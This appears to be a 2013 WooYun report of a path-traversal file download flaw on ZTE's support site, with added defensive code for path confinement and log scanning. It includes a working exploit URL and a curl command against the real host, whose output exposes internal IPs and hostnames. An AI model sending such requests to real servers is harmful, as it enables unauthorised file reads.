
Vulnerability summary

Defect ID: wooyun-2013-019327

Title: ZTE SUPPORT site file download vulnerability

Vendor: ZTE

Author: 大肠精

Submitted: 2013-03-03 15:49

Fix deadline: 2013-04-17 15:49

Public disclosure: 2013-04-17 15:49

Vulnerability type: arbitrary file traversal/download

Severity: medium

Self-assessed rank: 6

Status: vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2013-03-03: actively contacting the vendor and waiting for the vendor to claim the report; details withheld from the public
2013-04-17: the vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

Not going into detail here.

Detailed description:

After entering the SUPPORT site, register any account, then open the page below:
http://support.zte.com.cn/support/FileCenter/SptDownload.aspx?path=c:\WINDOWS\system32\drivers\etc\hosts&fileName=addd.txt&type=tsm
The server's hosts file can be downloaded this way: the path parameter is passed straight to the file read, so an absolute Windows path is accepted in place of a file inside the download area.
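The root cause described above is a download handler that trusts its path parameter. The following is an added example written for this report, not ZTE's code: it shows why naive joining leaks the base directory and a resolve-then-check replacement that refuses drive letters, UNC prefixes, leading slashes, ".." segments and symlink escapes. The download root, file names and request values are constructed.

```python
"""
Confining a download endpoint to its content root.

Added example for the report above, not ZTE's own code. The download root,
file names and request values below are constructed for demonstration.
"""
import tempfile
from pathlib import Path, PurePosixPath, PureWindowsPath
from typing import Optional


def naive_join(root: str, user_path: str) -> str:
    """The pattern that leaks files: os.path.join and pathlib's '/' both
    discard the base when the user-supplied part is absolute, so the
    configured root contributes nothing to the final path."""
    return str(Path(root) / user_path)


def is_safe_relative_name(user_path: str) -> bool:
    """Reject absolute paths, drive letters, UNC prefixes and '..' segments.
    Both Windows and POSIX interpretations are checked so the verdict does
    not depend on which OS the server happens to run on."""
    if not user_path or "\x00" in user_path:
        return False
    for pure in (PureWindowsPath(user_path), PurePosixPath(user_path)):
        if pure.drive or pure.root:  # 'c:', '\\\\server\\share', leading '/' or '\\'
            return False
        if ".." in pure.parts:
            return False
    return True


def resolve_download(root: Path, user_path: str) -> Optional[Path]:
    """Return the real file inside root, or None when the request must be refused."""
    if not is_safe_relative_name(user_path):
        return None
    # Map a Windows-style relative name ('manuals\\guide.txt') onto the same
    # segments on any OS before joining.
    rel = PurePosixPath(*PureWindowsPath(user_path).parts)
    root_real = root.resolve()
    candidate = (root_real / rel).resolve()
    # Containment check after resolve(): a symlink inside root that points
    # outside it is caught here, not by the string check above.
    if candidate != root_real and root_real not in candidate.parents:
        return None
    if not candidate.is_file():
        return None
    return candidate


def demo() -> dict:
    """Exercise the resolver against a throwaway root holding one constructed file."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "FileCenter"  # assumed download root
        (root / "manuals").mkdir(parents=True)
        (root / "manuals" / "guide.txt").write_text("constructed sample manual\n")
        return {
            "legit": resolve_download(root, "manuals/guide.txt") is not None,
            "legit_backslash": resolve_download(root, "manuals\\guide.txt") is not None,
            "drive_letter": resolve_download(root, r"c:\WINDOWS\system32\drivers\etc\hosts"),
            "traversal": resolve_download(root, "manuals/../../../etc/hosts"),
            "posix_abs": resolve_download(root, "/etc/hosts"),
            "missing": resolve_download(root, "manuals/absent.txt"),
        }


if __name__ == "__main__":
    print(demo())
```

The string check alone is not enough, which is why the containment test runs after resolve(): it is the only step that sees through symlinks and case or separator normalisation performed by the filesystem.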

Proof of vulnerability:

curl 'http://support.zte.com.cn/support/FileCenter/SptDownload.aspx?path=c:\WINDOWS\system32\drivers\etc\hosts&fileName=addd.txt&type=tsm'
# Copyright (c) 1993-1999 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
127.0.0.1 localhost
192.168.168.14 support-web1
10.30.1.26 baksvr
10.30.18.43 RSAAM1
10.30.18.44 RSAAM2
58.60.230.74 ascs.ztems.com
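For a site operator, the request in the proof above is also easy to spot after the fact. The following is an added example, not part of the original report: it scans constructed access-log lines (a simplified W3C-style layout: date, time, method, URI stem, query, status) and flags download requests whose path parameter is absolute, carries a drive letter, or contains a ".." segment, decoding the value a second time so double-encoded variants are not missed.

```python
"""
Flagging absolute or traversing path parameters in download requests.

Added example for the report above. The log lines are constructed and the
field layout is an assumed, simplified W3C-style access log.
"""
import re
from typing import List, Tuple
from urllib.parse import parse_qs, unquote

# Drive letter, leading slash/backslash (incl. UNC), or a '..' path segment.
SUSPECT = re.compile(r"^(?:[A-Za-z]:|[\\/])|(?:^|[\\/])\.\.(?:[\\/]|$)")

# Constructed sample log: one benign download, two abusive ones, one unrelated hit.
SAMPLE_LOG = """\
2013-03-03 07:49:01 GET /support/FileCenter/SptDownload.aspx path=manuals%2Fguide.pdf&fileName=guide.pdf&type=tsm 200
2013-03-03 07:49:13 GET /support/FileCenter/SptDownload.aspx path=c%3A%5CWINDOWS%5Csystem32%5Cdrivers%5Cetc%5Chosts&fileName=addd.txt&type=tsm 200
2013-03-03 07:49:20 GET /support/FileCenter/SptDownload.aspx path=docs%252F..%252F..%252Fweb.config&fileName=w.txt&type=tsm 200
2013-03-03 07:50:02 GET /support/index.aspx - 200
"""


def suspicious_path_values(query: str) -> List[str]:
    """Return every decoded 'path' value that looks absolute or traversing."""
    hits = []
    for value in parse_qs(query, keep_blank_values=True).get("path", []):
        # parse_qs decoded once; decode again to catch %252e-style encoding.
        for candidate in (value, unquote(value)):
            if SUSPECT.search(candidate):
                hits.append(candidate)
                break
    return hits


def flag_lines(log_text: str) -> List[Tuple[str, str]]:
    """Return (time, decoded path) for each request with a suspicious path parameter."""
    flagged = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 6 or parts[4] == "-":
            continue
        for bad in suspicious_path_values(parts[4]):
            flagged.append((parts[1], bad))
    return flagged


if __name__ == "__main__":
    for when, path in flag_lines(SAMPLE_LOG):
        print(f"{when}  suspicious path parameter: {path}")
```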

Fix recommendation:

Copyright notice: when reposting, please credit the source: 大肠精@乌云


Vulnerability response

Vendor response:

The vendor could not be contacted, or the vendor actively declined the report